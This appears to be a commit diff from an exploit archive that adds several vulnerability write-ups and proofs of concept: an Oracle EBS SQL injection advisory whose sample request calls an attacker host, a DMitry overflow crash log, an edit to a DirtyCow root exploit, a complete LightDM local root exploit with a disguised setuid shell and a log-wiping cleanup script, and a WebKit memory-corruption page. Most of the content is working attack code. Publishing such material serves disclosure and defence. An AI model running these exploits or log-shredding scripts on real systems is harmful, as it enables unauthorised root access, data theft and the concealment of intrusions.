Versions Affected: Oracle EBS 12.2.3
Vendor URL: http://oracle.com
Bug: SQL injection
Reported: 23.12.2016
Vendor response: 24.12.2016
Date of Public Advisory: 18.04.2017
Reference: Oracle CPU April 2017
Author: Dmitry Chastuhin (ERPScan)
Description
1. ADVISORY INFORMATION
Title:[ERPSCAN-17-021] SQL Injection in E-Business Suite IESFOOTPRINT
Advisory ID: [ERPSCAN-17-021]
Risk: high
CVE: CVE-2017-3549
Advisory URL: https://erpscan.com/advisories/erpscan-17-021-sql-injection-e-business-suite-iesfootprint/
Date published: 18.04.2017
Vendors contacted: Oracle
2. VULNERABILITY INFORMATION
Class: SQL injection
Impact: read sensitive data, modify data from database
Remotely Exploitable: yes
Locally Exploitable: no
CVSS Information
CVSS Base Score v3: 8.0 / 10
CVSS Base Vector:
AV : Attack Vector (Related exploit range) Network (N)
AC : Attack Complexity (Required attack complexity) High (H)
PR : Privileges Required (Level of privileges needed to exploit) High (H)
UI : User Interaction (Required user participation) None (N)
S : Scope (Change in scope due to impact caused to components beyond
the vulnerable component) Changed (C)
C : Impact to Confidentiality High (H)
I : Impact to Integrity High (H)
A : Impact to Availability High (H)
3. VULNERABILITY DESCRIPTION
The code comprises an SQL statement containing strings that can be
altered by an attacker. The manipulated SQL statement can be used then
to retrieve additional data from the database or to modify the data
without authorization.
4. VULNERABLE PACKAGES
Oracle EBS 12.2.3
5. SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, implement Oracle CPU April 2017
6. AUTHOR
Dmitry Chastuhin
7. TECHNICAL DESCRIPTION
PoC
vulnerable jsp name is iesfootprint.jsp
deployDate = ((request.getParameter("deployDate")) != null) ?
request.getParameter("deployDate") : "";
responseDate = ((request.getParameter("responseDate")) != null) ?
request.getParameter("responseDate") : "";
dscriptName = ((request.getParameter("dscript_name")) != null) ?
request.getParameter("dscript_name") : "";
dscriptId = ((request.getParameter("dscriptId")) != null) ?
request.getParameter("dscriptId") : "";
%>
<%
// Process the data based on params
if (showGraph) {
// Create Query String
StringBuffer query = new StringBuffer("SELECT panel_name,
count_panels, avg_time, min_time, max_time, ");
query.append("\'").append(_prompts[10]).append("\'");
query.append(" Average_Time FROM (SELECT rownum, panel_name,
count_panels, avg_time, min_time, max_time FROM (SELECT Panel_name,
count(panel_name) count_panels,
(sum(total_time)/count(panel_name))/1000 avg_time, min(min_time)/1000
min_time, max(max_time)/1000 max_time FROM IES_SVY_FOOTPRINT_V WHERE
dscript_id = ");
query.append(dscriptId);
query.append(" AND start_time between ");
query.append("\'").append(deployDate).append("\'");
query.append(" and ");
query.append("\'").append(responseDate).append("\'");
query.append(" GROUP BY panel_name ORDER BY avg_time desc)) WHERE
rownum < 11");
// Get XMLDocument for the corresponding query and Paint graph
try {
XMLDocument xmlDoc = XMLServ.getSQLasXML(query.toString());
htmlString =XMLServ.getXMLTransform(xmlDoc,htmlURL);
Approximate request with SQL injection
http://ebs.example.com/OA_HTML/iesfootprint.jsp?showgraph=true&dscriptId=11'
AND utl_http.request('http://attackers_host/lalal')='1' GROUP BY
panel_name)) --
8. ABOUT ERPScan Research
ERPScan research team specializes in vulnerability research and
analysis of critical enterprise applications. It was acknowledged
multiple times by the largest software vendors like SAP, Oracle,
Microsoft, IBM, VMware, HP for discovering more than 400
vulnerabilities in their solutions (200 of them just in SAP!).
ERPScan researchers are proud of discovering new types of
vulnerabilities (TOP 10 Web Hacking Techniques 2012) and of the "The
Best Server-Side Bug" nomination at BlackHat 2013.
ERPScan experts participated as speakers, presenters, and trainers at
60+ prime international security conferences in 25+ countries across
the continents ( e.g. BlackHat, RSA, HITB) and conducted private
trainings for several Fortune 2000 companies.
ERPScan researchers carry out the EAS-SEC project that is focused on
enterprise application security awareness by issuing annual SAP
security researches.
ERPScan experts were interviewed in specialized info-sec resources and
featured in major media worldwide. Among them there are Reuters,
Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise,
Chinabyte, etc.
Our team consists of highly-qualified researchers, specialized in
various fields of cybersecurity (from web application to ICS/SCADA
systems), gathering their experience to conduct the best SAP security
research.
9. ABOUT ERPScan
ERPScan is the most respected and credible Business Application
Cybersecurity provider. Founded in 2010, the company operates globally
and enables large Oil and Gas, Financial, Retail and other
organizations to secure their mission-critical processes. Named as an
Emerging Vendor in Security by CRN, listed among “TOP 100 SAP
Solution providers” and distinguished by 30+ other awards, ERPScan is
the leading SAP SE partner in discovering and resolving security
vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to
assist in improving the security of their latest solutions.
ERPScans primary mission is to close the gap between technical and
business security, and provide solutions for CISO's to evaluate and
secure SAP and Oracle ERP systems and business-critical applications
from both cyberattacks and internal fraud. As a rule, our clients are
large enterprises, Fortune 2000 companies and MSPs, whose requirements
are to actively monitor and manage security of vast SAP and Oracle
landscapes on a global scale.
We follow the sun and have two hubs, located in Palo Alto and
Amsterdam, to provide threat intelligence services, continuous support
and to operate local offices and partner network spanning 20+
countries around the globe.
Address USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301
Phone: 650.798.5255
Twitter: @erpscan
Scoop-it: Business Application Security

0
platforms/linux/shellcode/41439.c → platforms/lin_x86-64/shellcode/41439.c
View file

0
platforms/linux/shellcode/41477.c → platforms/lin_x86-64/shellcode/41477.c
View file

107
platforms/linux/dos/41898.txt Executable file
View file

@ -0,0 +1,107 @@
################
#Exploit Title: Dmitry(Deepmagic Information Gathering Tool) Local Stack Buffer Overflow
#CVE: CVE-2017-7938
#CWE: CWE-119
#Exploit Author: Hosein Askari (FarazPajohan)
#Vendor HomePage: http://mor-pah.net/software/dmitry-deepmagic-information-gathering-tool/
#Version : 1.3a (Unix)
#Exploit Tested on: Parrot OS
#Date: 19-04-2017
#Category: Application
#Author Mail : hosein.askari@aol.com
#Description: Buffer overflow in DMitry (Deepmagic Information Gathering Tool) version 1.3a (Unix) allows attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a long argument. An example threat model is automated execution of DMitry with hostname strings found in local log files.
###############################
#valgrind dmitry $(python -c 'print "A"*64')
==11312== Memcheck, a memory error detector
==11312== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al.
==11312== Using Valgrind-3.12.0 and LibVEX; rerun with -h for copyright info
==11312== Command: dmitry AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
==11312==
Deepmagic Information Gathering Tool
"There be some deep magic going on"
ERROR: Unable to locate Host IP addr. for AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Continuing with limited modules
HostIP:
HostName:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Gathered Inic-whois information for AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
---------------------------------
Error: Unable to connect - Invalid Host
ERROR: Connection to InicWhois Server AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA failed
Gathered Netcraft information for AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
---------------------------------
Retrieving Netcraft.com information for AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Netcraft.com Information gathered
**11312** *** strcpy_chk: buffer overflow detected ***: program terminated
==11312== at 0x4030DD7: VALGRIND_PRINTF_BACKTRACE (valgrind.h:6818)
==11312== by 0x40353AA: __strcpy_chk (vg_replace_strmem.c:1439)
==11312== by 0x804B5F7: ??? (in /usr/bin/dmitry)
==11312== by 0x8048ED8: ??? (in /usr/bin/dmitry)
==11312== by 0x407D275: (below main) (libc-start.c:291)
==11312==
==11312== HEAP SUMMARY:
==11312== in use at exit: 0 bytes in 0 blocks
==11312== total heap usage: 82 allocs, 82 frees, 238,896 bytes allocated
==11312==
==11312== All heap blocks were freed -- no leaks are possible
==11312==
==11312== For counts of detected and suppressed errors, rerun with: -v
==11312== ERROR SUMMARY: 0 errors from 0 contexts (suppressed: 0 from 0)
======================================
GDB output:
(gdb) run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Starting program: /usr/bin/dmitry AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Deepmagic Information Gathering Tool
"There be some deep magic going on"
ERROR: Unable to locate Host IP addr. for AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Continuing with limited modules
*** buffer overflow detected ***: /usr/bin/dmitry terminated
======= Backtrace: =========
/lib/i386-linux-gnu/libc.so.6(+0x6737a)[0xb7e5a37a]
/lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x37)[0xb7eeae17]
/lib/i386-linux-gnu/libc.so.6(+0xf60b8)[0xb7ee90b8]
/lib/i386-linux-gnu/libc.so.6(+0xf56af)[0xb7ee86af]
/usr/bin/dmitry[0x8048e04]
/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf6)[0xb7e0b276]
/usr/bin/dmitry[0x80490a4]
======= Memory map: ========
08048000-0804f000 r-xp 00000000 08:01 7209647 /usr/bin/dmitry
0804f000-08050000 r--p 00006000 08:01 7209647 /usr/bin/dmitry
08050000-08051000 rw-p 00007000 08:01 7209647 /usr/bin/dmitry
08051000-08073000 rw-p 00000000 00:00 0 [heap]
b7d9f000-b7dbb000 r-xp 00000000 08:01 24248323 /lib/i386-linux-gnu/libgcc_s.so.1
b7dbb000-b7dbc000 r--p 0001b000 08:01 24248323 /lib/i386-linux-gnu/libgcc_s.so.1
b7dbc000-b7dbd000 rw-p 0001c000 08:01 24248323 /lib/i386-linux-gnu/libgcc_s.so.1
b7dbd000-b7dd1000 r-xp 00000000 08:01 24249970 /lib/i386-linux-gnu/libresolv-2.24.so
b7dd1000-b7dd2000 r--p 00013000 08:01 24249970 /lib/i386-linux-gnu/libresolv-2.24.so
b7dd2000-b7dd3000 rw-p 00014000 08:01 24249970 /lib/i386-linux-gnu/libresolv-2.24.so
b7dd3000-b7dd5000 rw-p 00000000 00:00 0
b7dd5000-b7dda000 r-xp 00000000 08:01 24249963 /lib/i386-linux-gnu/libnss_dns-2.24.so
b7dda000-b7ddb000 r--p 00004000 08:01 24249963 /lib/i386-linux-gnu/libnss_dns-2.24.so
b7ddb000-b7ddc000 rw-p 00005000 08:01 24249963 /lib/i386-linux-gnu/libnss_dns-2.24.so
b7ddc000-b7dde000 r-xp 00000000 08:01 24249725 /lib/i386-linux-gnu/libnss_mdns4_minimal.so.2
b7dde000-b7ddf000 r--p 00001000 08:01 24249725 /lib/i386-linux-gnu/libnss_mdns4_minimal.so.2
b7ddf000-b7de0000 rw-p 00002000 08:01 24249725 /lib/i386-linux-gnu/libnss_mdns4_minimal.so.2
b7de0000-b7deb000 r-xp 00000000 08:01 24249964 /lib/i386-linux-gnu/libnss_files-2.24.so
b7deb000-b7dec000 r--p 0000a000 08:01 24249964 /lib/i386-linux-gnu/libnss_files-2.24.so
b7dec000-b7ded000 rw-p 0000b000 08:01 24249964 /lib/i386-linux-gnu/libnss_files-2.24.so
b7ded000-b7df3000 rw-p 00000000 00:00 0
b7df3000-b7fa4000 r-xp 00000000 08:01 24249955 /lib/i386-linux-gnu/libc-2.24.so
b7fa4000-b7fa6000 r--p 001b0000 08:01 24249955 /lib/i386-linux-gnu/libc-2.24.so
b7fa6000-b7fa7000 rw-p 001b2000 08:01 24249955 /lib/i386-linux-gnu/libc-2.24.so
b7fa7000-b7faa000 rw-p 00000000 00:00 0
b7fd4000-b7fd7000 rw-p 00000000 00:00 0
b7fd7000-b7fd9000 r--p 00000000 00:00 0 [vvar]
b7fd9000-b7fdb000 r-xp 00000000 00:00 0 [vdso]
b7fdb000-b7ffd000 r-xp 00000000 08:01 24249741 /lib/i386-linux-gnu/ld-2.24.so
b7ffd000-b7ffe000 rw-p 00000000 00:00 0
b7ffe000-b7fff000 r--p 00022000 08:01 24249741 /lib/i386-linux-gnu/ld-2.24.so
b7fff000-b8000000 rw-p 00023000 08:01 24249741 /lib/i386-linux-gnu/ld-2.24.so
bffdf000-c0000000 rw-p 00000000 00:00 0 [stack]
Program received signal SIGABRT, Aborted.
0xb7fd9cf9 in __kernel_vsyscall ()

11
platforms/linux/local/40839.c
View file

@ -1,4 +1,3 @@
// EDB-Note: After getting a shell, doing "echo 0 > /proc/sys/vm/dirty_writeback_centisecs" may make the system more stable.
//
// This exploit uses the pokemon exploit of the dirtycow vulnerability
// as a base and automatically generates a new passwd line.
@ -185,10 +184,10 @@ int main(int argc, char *argv[])
pthread_join(pth,NULL);
}
printf("Done! Check %s to see if the new user was created\n", filename);
printf("You can log in with username %s and password %s.\n\n",
printf("Done! Check %s to see if the new user was created.\n", filename);
printf("You can log in with the username '%s' and the password '%s'.\n\n",
user.username, plaintext_pw);
printf("\nDON'T FORGET TO RESTORE %s FROM %s !!!\n\n",
filename, backup_filename);
printf("\nDON'T FORGET TO RESTORE! $ mv %s %s\n",
backup_filename, filename);
return 0;
}
}

456
platforms/linux/local/41923.txt Executable file
View file

@ -0,0 +1,456 @@
Source: https://blogs.securiteam.com/index.php/archives/3134
Vulnerability Summary
The following advisory describes a local privilege escalation via LightDM
found in Ubuntu versions 16.10 / 16.04 LTS.
Ubuntu is an open source software platform that runs everywhere from IoT
devices, the smartphone, the tablet and the PC to the server and the
cloud. LightDM is an X display manager that aims to be lightweight, fast,
extensible and multi-desktop. It uses various front-ends to draw login
interfaces, also called Greeters.
Credit
An independent security researcher, G. Geshev (@munmap), has reported this
vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program
Vendor Responses
The vendor has released a patch to address this issue.
For more information: https://www.ubuntu.com/usn/usn-3255-1/
CVE Details
CVE-2017-7358 <https://nvd.nist.gov/vuln/detail/CVE-2017-7358>
Vulnerability Details
The vulnerability is found in *LightDM*, which is the Ubuntus default
desktop manager, more specifically in the guest login feature. By default
*LightDM* allows you to log into a session as a temporary user. This is
implemented in a script called *guest-account*.
@ubuntu:~$ ls -l /usr/sbin/guest-account
-rwxr-xr-x 1 root root 6516 Sep 29 18:56 /usr/sbin/guest-account
@ubuntu:~$ dpkg -S /usr/sbin/guest-account
lightdm: /usr/sbin/guest-account
@ubuntu:~$ dpkg -s lightdm
Package: lightdm
Status: install ok installed
Priority: optional
Section: x11
Installed-Size: 672
Maintainer: Robert Ancell <robert.ancell@ubuntu.com>
Architecture: amd64
Version: 1.19.5-0ubuntu1
Provides: x-display-manager
Depends: debconf (>= 0.5) | debconf-2.0, libc6 (>= 2.14), libgcrypt20 (>=
1.7.0), libglib2.0-0 (>= 2.39.4), libpam0g (>= 0.99.7.1), libxcb1, libxdmcp6
, adduser, bash (>= 4.3), dbus, libglib2.0-bin, libpam-runtime (>= 0.76-14),
libpam-modules, plymouth (>= 0.8.8-0ubuntu18)
Pre-Depends: dpkg (>= 1.15.7.2)
Recommends: xserver-xorg, unity-greeter | lightdm-greeter | lightdm-kde-
greeter
Suggests: bindfs
Conflicts: liblightdm-gobject-0-0, liblightdm-qt-0-0
Conffiles:
/etc/apparmor.d/abstractions/lightdm a715707411c3cb670a68a4ad738077bf
/etc/apparmor.d/abstractions/lightdm_chromium-browser
e1195e34922a67fa219b8b95eaf9c305
/etc/apparmor.d/lightdm-guest-session 3c7812f49f27e733ad9b5d413c4d14cb
/etc/dbus-1/system.d/org.freedesktop.DisplayManager.conf
b76b6b45d7f7ff533c51d7fc02be32f4
/etc/init.d/lightdm be2b1b20bec52a04c1a877477864e188
/etc/init/lightdm.conf 07304e5b3265b4fb82a2c94beb9b577e
/etc/lightdm/users.conf 1de1a7e321b98e5d472aa818893a2a3e
/etc/logrotate.d/lightdm b6068c54606c0499db9a39a05df76ce9
/etc/pam.d/lightdm 1abe2be7a999b42517c82511d9e9ba22
/etc/pam.d/lightdm-autologin 28dd060554d1103ff847866658431ecf
/etc/pam.d/lightdm-greeter 65ed119ce8f4079f6388b09ad9d8b2f9
Description: Display Manager
LightDM is a X display manager that:
* Has a lightweight codebase
* Is standards compliant (PAM, ConsoleKit, etc)
* Has a well defined interface between the server and user interface
* Cross-desktop (greeters can be written in any toolkit)
Homepage: https://launchpad.net/lightdm
@ubuntu:~$
The script runs as root when you view the login screen, also known as a
greeter, to log in as a guest. Ubuntus default greeter is Unity Greeter.
*Vulnerable code*
The vulnerable function is *add_account*.
35 temp_home=$(mktemp -td guest-XXXXXX)
36 GUEST_HOME=$(echo ${temp_home} | tr '[:upper:]' '[:lower:]')
37 GUEST_USER=${GUEST_HOME#/tmp/}
38 [ ${GUEST_HOME} != ${temp_home} ] && mv ${temp_home} ${GUEST_HOME}
The guest folder gets created using mktemp on line 35. The attacker can
use *inotify* to monitor */tmp* for the creation of this folder.
The folder name will likely contain both upper and lower case letters. Once
this folder is created, we grab the folder name and quickly and create the
equivalent folder with all letters lower case.
If we manage to race the *mv* command on line 38, we end up with the
newly created home for the guest user inside the folder we own.
Once we have the guest home under our control, we rename it and replace it
with a *symbolic link* to a folder we want to take over. The code below
will then add the new user to the OS. The users home folder will already
point to the folder we want to take over, for example */usr/local/sbin*.
68 useradd --system --home-dir ${GUEST_HOME} --comment $(gettext "Guest")
--user-group --shell /bin/bash ${GUEST_USER} || {
69 rm -rf ${GUEST_HOME}
70 exit 1
71 }
The attacker can grab the newly created users ID and monitor
*/usr/local/sbin* for ownership changes. The ownership will be changed by
the following *mount*.
78 mount -t tmpfs -o mode=700,uid=${GUEST_USER} none ${GUEST_HOME} || {
79 rm -rf ${GUEST_HOME}
80 exit 1
81 }
We will remove the symbolic link and create a folder with the same name
to let the guest user to log in. While the guest is logging in, his path
for finding executable files will include *bin* under his home folder.
Thats why we create a new symbolic link to point his *bin* into a folder
we control. This way we can force the user to execute our own code under
his user ID. We use this to log out the guest user from his session which
is where we can gain root access.
The logout code will first execute the following code:
156 PWENT=$(getent passwd ${GUEST_USER}) || {
157 echo "Error: invalid user ${GUEST_USER}"
158 exit 1
159 }
This code will be executed as the owner of the script, i.e. root. Since we
have already taken over */usr/local/sbin* and have planted our own
*getent*, we get to execute commands as root at this point.
Note We can trigger the guest session creation script by entering the
following two commands.
XDG_SEAT_PATH="/org/freedesktop/DisplayManager/Seat0" /usr/bin/dm-tool lock
XDG_SEAT_PATH="/org/freedesktop/DisplayManager/Seat0" /usr/bin/dm-tool
switch-to-guest
Proof of Concept
The Proof of Concept is contains 9 files and they will take advantage of
the race conditions mentioned above.
1. kodek/bin/cat
2. kodek/shell.c
3. kodek/clean.sh
4. kodek/run.sh
5. kodek/stage1.sh
6. kodek/stage1local.sh
7. kodek/stage2.sh
8. kodek/boclocal.c
9. kodek/boc.c
By running the following scripts an attacker can run root commands:
@ubuntu:/var/tmp/kodek$ ./stage1local.sh
@ubuntu:/var/tmp/kodek$
[!] GAME OVER !!!
[!] count1: 2337 count2: 7278
[!] w8 1 minute and run /bin/subash
@ubuntu:/var/tmp/kodek$ /bin/subash
root@ubuntu:~# id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:~#
If the exploit fails, you can simply run it again.
Once you get your root shell, you can optionally clean any exploit files
and logs by executing the below.
root@ubuntu:/var/tmp/kodek# ./clean.sh
/usr/bin/shred: /var/log/audit/audit.log: failed to open for writing: No such
file or directory
Do you want to remove exploit (y/n)?
y
/usr/bin/shred: /var/tmp/kodek/bin: failed to open for writing: Is a
directory
root@ubuntu:/var/tmp/kodek#
boc.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <ctype.h>
#include <sys/inotify.h>
#include <sys/stat.h>
#include <pwd.h>
#define EVENT_SIZE(sizeof(struct inotify_event))
#define EVENT_BUF_LEN(1024 * (EVENT_SIZE + 16))
int main(void) {
struct stat info;
struct passwd * pw;
struct inotify_event * event;
pw = getpwnam("root");
if (pw == NULL) exit(0);
char newpath[20] = "old.";
int length = 0, i, fd, wd, count1 = 0, count2 = 0;
int a, b;
char buffer[EVENT_BUF_LEN];
fd = inotify_init();
if (fd < 0) exit(0);
wd = inotify_add_watch(fd, "/tmp/", IN_CREATE | IN_MOVED_FROM);
if (wd < 0) exit(0);
chdir("/tmp/");
while (1) {
length = read(fd, buffer, EVENT_BUF_LEN);
if (length > 0) {
event = (struct inotify_event * ) buffer;
if (event - > len) {
if (strstr(event - > name, "guest-") != NULL) {
for (i = 0; event - > name[i] != '\0'; i++) {
event - > name[i] = tolower(event - > name[i]);
}
if (event - > mask & IN_CREATE) mkdir(event - > name, ACCESSPERMS)
;
if (event - > mask & IN_MOVED_FROM) {
rename(event - > name, strncat(newpath, event - > name, 15));
symlink("/usr/local/sbin/", event - > name);
while (1) {
count1 = count1 + 1;
pw = getpwnam(event - > name);
if (pw != NULL) break;
}
while (1) {
count2 = count2 + 1;
stat("/usr/local/sbin/", & info);
if (info.st_uid == pw - > pw_uid) {
a = unlink(event - > name);
b = mkdir(event - > name, ACCESSPERMS);
if (a == 0 && b == 0) {
printf("\n[!] GAME OVER !!!\n[!] count1: %i count2: %i\n",
count1, count2);
} else {
printf("\n[!] a: %i b: %i\n[!] exploit failed !!!\n", a, b
);
}
system("/bin/rm -rf /tmp/old.*");
inotify_rm_watch(fd, wd);
close(fd);
exit(0);
}
}
}
}
}
}
}
}
boclocal.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <ctype.h>
#include <sys/inotify.h>
#include <sys/stat.h>
#include <pwd.h>
#define EVENT_SIZE(sizeof(struct inotify_event))
#define EVENT_BUF_LEN(1024 * (EVENT_SIZE + 16))
int main(void) {
struct stat info;
struct passwd * pw;
struct inotify_event * event;
pw = getpwnam("root");
if (pw == NULL) exit(0);
char newpath[20] = "old.";
int length = 0, i, fd, wd, count1 = 0, count2 = 0;
int a, b, c;
char buffer[EVENT_BUF_LEN];
fd = inotify_init();
if (fd < 0) exit(0);
wd = inotify_add_watch(fd, "/tmp/", IN_CREATE | IN_MOVED_FROM);
if (wd < 0) exit(0);
chdir("/tmp/");
while (1) {
length = read(fd, buffer, EVENT_BUF_LEN);
if (length > 0) {
event = (struct inotify_event * ) buffer;
if (event - > len) {
if (strstr(event - > name, "guest-") != NULL) {
for (i = 0; event - > name[i] != '\0'; i++) {
event - > name[i] = tolower(event - > name[i]);
}
if (event - > mask & IN_CREATE) mkdir(event - > name, ACCESSPERMS)
;
if (event - > mask & IN_MOVED_FROM) {
rename(event - > name, strncat(newpath, event - > name, 15));
symlink("/usr/local/sbin/", event - > name);
while (1) {
count1 = count1 + 1;
pw = getpwnam(event - > name);
if (pw != NULL) break;
}
while (1) {
count2 = count2 + 1;
stat("/usr/local/sbin/", & info);
if (info.st_uid == pw - > pw_uid) {
a = unlink(event - > name);
b = mkdir(event - > name, ACCESSPERMS);
c = symlink("/var/tmp/kodek/bin/", strncat(event - > name,
"/bin", 5));
if (a == 0 && b == 0 && c == 0) {
printf("\n[!] GAME OVER !!!\n[!] count1: %i count2:
%i\n[!] w8 1 minute and run /bin/subash\n", count1, count2);
} else {
printf("\n[!] a: %i b: %i c: %i\n[!] exploit failed
!!!\n[!] w8 1 minute and run it again\n", a, b, c);
}
system("/bin/rm -rf /tmp/old.*");
inotify_rm_watch(fd, wd);
close(fd);
exit(0);
}
}
}
}
}
}
}
}
clean.sh
#!/bin/bash
if [ "$(/usr/bin/id -u)" != "0" ]; then
echo "This script must be run as root" 1>&2
exit 1
fi
/bin/rm -rf /tmp/guest-* /tmp/old.guest-*
/usr/bin/shred -fu /var/tmp/run.sh /var/tmp/shell /var/tmp/boc /var/log/kern
.log /var/log/audit/audit.log /var/log/lightdm/*
/bin/echo > /var/log/auth.log
/bin/echo > /var/log/syslog
/bin/dmesg -c >/dev/null 2>&1
/bin/echo "Do you want to remove exploit (y/n)?"
read answer
if [ "$answer" == "y" ]; then
/usr/bin/shred -fu /var/tmp/kodek/* /var/tmp/kodek/bin/*
/bin/rm -rf /var/tmp/kodek
else
exit
fi
run.sh
#!/bin/sh
/bin/cat << EOF > /usr/local/sbin/getent
#!/bin/bash
/bin/cp /var/tmp/shell /bin/subash >/dev/null 2>&1
/bin/chmod 4111 /bin/subash >/dev/null 2>&1
COUNTER=0
while [ \$COUNTER -lt 10 ]; do
/bin/umount -lf /usr/local/sbin/ >/dev/null 2>&1
let COUNTER=COUNTER+1
done
/bin/sed -i 's/\/usr\/lib\/lightdm\/lightdm-guest-session
{/\/usr\/lib\/lightdm\/lightdm-guest-session flags=(complain) {/g' /etc/
apparmor.d/lightdm-guest-session >/dev/null 2>&1
/sbin/apparmor_parser -r /etc/apparmor.d/lightdm-guest-session >/dev/null 2>
&1
/usr/bin/getent passwd "\$2"
EOF
/bin/chmod 755 /usr/local/sbin/getent >/dev/null 2>&1
shell.c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <grp.h>
int main(void)
{
setresuid(0, 0, 0);
setresgid(0, 0, 0);
setgroups(0, NULL);
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "[bioset]", "-pi", NULL);
return 0;
}
stage1.sh
#!/bin/bash
if [ "${PWD}" == "/var/tmp/kodek" ]; then
/usr/bin/killall -9 /var/tmp/boc >/dev/null 2>&1
/usr/bin/killall -9 boc >/dev/null 2>&1
/bin/sleep 3s
/usr/bin/shred -fu /var/tmp/run.sh /var/tmp/shell /var/tmp/boc >/dev/null 2>
&1
/usr/bin/gcc boc.c -Wall -s -o /var/tmp/boc
/usr/bin/gcc shell.c -Wall -s -o /var/tmp/shell
/bin/cp /var/tmp/kodek/run.sh /var/tmp/run.sh
/var/tmp/boc
else
echo "[!] run me from /var/tmp/kodek"
exit
fi
stage1local.sh
#!/bin/bash
if [ "${PWD}" == "/var/tmp/kodek" ]; then
/usr/bin/killall -9 /var/tmp/boc >/dev/null 2>&1
/usr/bin/killall -9 boc >/dev/null 2>&1
/bin/sleep 3s
/usr/bin/shred -fu /var/tmp/run.sh /var/tmp/shell /var/tmp/boc >/dev/null 2>
&1
/usr/bin/gcc boclocal.c -Wall -s -o /var/tmp/boc
/usr/bin/gcc shell.c -Wall -s -o /var/tmp/shell
/bin/cp /var/tmp/kodek/run.sh /var/tmp/run.sh
/var/tmp/boc &
/bin/sleep 5s
XDG_SEAT_PATH="/org/freedesktop/DisplayManager/Seat0" /usr/bin/dm-tool lock
XDG_SEAT_PATH="/org/freedesktop/DisplayManager/Seat0" /usr/bin/dm-tool
switch-to-guest
else
echo "[!] run me from /var/tmp/kodek"
exit
fi
stage2.sh
#!/bin/sh
/usr/bin/systemd-run --user /var/tmp/run.sh
/bin/cat
#!/bin/sh
/usr/bin/systemd-run --user /var/tmp/run.sh
/bin/sleep 15s
/bin/loginctl terminate-session `/bin/loginctl session-status | /usr/bin/
head -1 | /usr/bin/awk '{ print $1 }'`

67
platforms/multiple/dos/41931.html Executable file
View file

@ -0,0 +1,67 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1095
There is an out-of-bounds memcpy in Array.concat that can lead to memory corruption.
In builtins/ArrayPrototype.js, the function concatSlowPath calls a native method @appendMemcpy with a parameter resultIndex that is handled unsafely by the method. It calls JSArray::appendMemcpy, which calculates the memory size for the combined arrays as follows:
unsigned newLength = startIndex + otherLength;
If startIndex (resultIndex from concatSlowPath in JS) is very large, an integer overflow can occur, causing too small a buffer to be allocated, and copying to occur outside of the buffer.
It should be difficult to reach this state without a long execution time, because an array of length resultIndex needs to be allocated and copied before resultIndex is incremented, however if both arrays involved in the concatenation are of type ArrayWithUndecided JSArray::appendMemcpy returns true without copying, and resultIndex can be incremented with a low execution time.
Arrays of type ArrayWithUndecided are usually of length 0, however, it is possible to create one by calling Array.splice on an array with all undefined elements. This will cause an undefined Array of the delete length to be allocated, and then returned without it being written to, which would cause it to decide its type.
A minimal PoC is as follows, and a full PoC is attached.
var a = [];
a.length = 0xffffff00;
var b = a.splice(0, 0x100000); // Undecided array
var args = [];
args.length = 4094;
args.fill(b);
var q = [];
q.length = 0x1000;
q.fill(7);
var c = a.splice(0, 0xfffef); //Shorter undecided array
args[4094] = c;
args[4095] = q;
b.concat.apply(b, args);
-->
<html>
<body>
<script>
var a = [];
a.length = 0xffffff00;
var b = a.splice(0, 0x100000); // Undecided array
var args = [];
args.length = 4094;
args.fill(b);
var q = [];
q.length = 0x1000;
q.fill(7);
var c = a.splice(0, 0xfffef); //Shorter undecided array
args[4094] = c;
args[4095] = q;
b.concat.apply(b, args);
</script>
</body>
</html>

198
platforms/multiple/dos/41932.cpp Executable file
View file

@ -0,0 +1,198 @@
/*
